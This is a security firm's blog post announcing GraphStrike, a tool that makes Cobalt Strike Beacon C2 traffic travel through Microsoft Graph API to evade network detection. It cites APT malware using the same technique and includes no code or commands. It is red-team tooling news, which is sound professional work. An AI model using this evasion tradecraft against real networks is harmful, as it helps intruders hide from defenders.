GraphStrike: Using Microsoft Graph API to Make Beacon Traffic Disappear

By Red Siege | January 22, 2024

By: Alex Reid, Current Red Siege Intern

We at Red Siege are proud to introduce GraphStrike: a tool suite for use with Cobalt Strike that enables Beacons to use Microsoft Graph API for HTTPS C2 communications. All implant traffic will route through and become very difficult to identify as Beacon uses legitimate methods to interact with Microsoft Cloud resources.

In the offensive security world, when evasion is brought up it is usually in the context of Anti-Virus (AV) or Endpoint Detection and Response (EDR). Host-based detections remain the chief concern for most offensive security engineers when designing malware or other tooling, but organizations are increasingly complementing their security stacks with mature network-based detection capabilities. Network evasion isn’t a new concept, with the commercial Command and Control (C2) software Cobalt Strike adding functionality to customize the appearance of its network traffic in 2014. In the intervening years however, the capability and fidelity of network-based monitoring and detection mechanisms have progressed to now present a real challenge during offensive operations.

Advanced Persistent Threats (APTs) and other real-world threat actors have also taken notice, increasingly turning to commercial third-party services like Slack, Discord, Google Drive, and Telegram to smuggle their C2 traffic out of a compromised network without detection. Legitimate services are incredibly attractive for C2 purposes, with aggressors able to abuse their reputation to blend in and avoid scrutiny. While the options are myriad, Microsoft services are particularly attractive targets due to how ubiquitous the use of programs like Microsoft Teams, Outlook, and OneDrive is. To make things easier, all of these services can be accessed and manipulated via Microsoft Graph API. From Microsoft:

Microsoft Graph is a RESTful web API that enables you to access Microsoft Cloud service resources.

APTs have been observed deploying malware that uses Graph API for C2 in campaigns over the past several years. Examples include:

  1. BLUELIGHT – APT37/InkySquid/ScarCruft

  2. Graphite – APT28/Fancy Bear

  3. Graphican – APT15/Nickel/The Flea

  4. SiestaGraph – UNKNOWN

Network traffic addressed to Microsoft owned domains and IPs is extremely unlikely to draw attention, and it can be very difficult to distinguish legitimate usage of Graph API within a network from illegitimate. As offensive security professionals we are in the business of adversary emulation, but implementing third-party services for C2 can be challenging, both from a technical standpoint as well as in regards to time and resources. To address these challenges and enable authorized red teams to easily bring advanced adversarial tradecraft to the table, Red Siege is pleased to announce the release of GraphStrike.

GraphStrike is a tool suite for use with Cobalt Strike that enables Beacons to use Graph API for HTTPS C2 communications. It includes a provisioner to easily set up required assets, both locally and in Azure, with the only real prerequisite being a Microsoft tenant with a SharePoint site:

After completing setup and importing a single Cobalt Strike aggressor script, Beacons generated by the Cobalt Strike Team Server will send all C2 traffic to This can be seen in the following image (you’ll need to zoom in):

Depicted is a Wireshark capture showing a DNS request for and an answer containing the corresponding IP. An HTTPS connection is then initiated to that IP, and using Process Explorer we can see that the GraphStrike.exe process initiated and holds this connection. In the bottom left of the image, a screen capture from Cobalt Strike shows a Beacon calling out from the GraphStrike.exe process and confirms that the connection seen in Wireshark belongs to the implant.

GraphStrike supports almost all native Cobalt Strike capabilities and aims to make the use of Graph API for authorized red team engagements simple, reliable, and effective.

A developer blog post detailing the design process and technical details of GraphStrike may be found at GraphStrike: Anatomy of Offensive Tool Development

GraphStrike is available for download here.


About Alex Reid, Intern:

Alex Reid is an intern at Red Siege Information Security. Alex got started in offensive security 4 years ago on the United States Navy Red Team, and has been awarded several medals by the military for his work there as an advanced capabilities developer and red team technical lead. He has presented at several DoD Red Team conferences and is an active contributor to the offensive security community via open source tooling published on his personal GitHub.



Connect on Twitter and Linkedin

Adventures in Shellcode Obfuscation! Part 1: Overview

By Red Siege | June 17, 2024

by Mike Saunders, Principal Security Consultant This blog is the first in a series of articles on methods for obfuscating shellcode. I’ll be focusing on how to obfuscate shellcode to […]

Learn More
Adventures in Shellcode Obfuscation! Part 1: Overview

Essential Steps for Management to Maximize the Value of a Penetration Test Report

By Red Siege | June 3, 2024

by Tim Medin, CEO Penetration testing is a critical component of a well-rounded cybersecurity strategy. Penetration testing identifies vulnerabilities before malicious actors can exploit them. However, the true value of […]

Learn More
Essential Steps for Management to Maximize the Value of a Penetration Test Report

Fun With JWT X5u

By Red Siege | May 30, 2024

by Senior Security Consultant Douglas Berdeaux On a recent web application penetration test engagement, I came across a JSON Web Token (JWT) that contained an x5u header parameter. I almost […]

Learn More
Fun With JWT X5u

Find Out What’s Next

Stay in the loop with our upcoming events.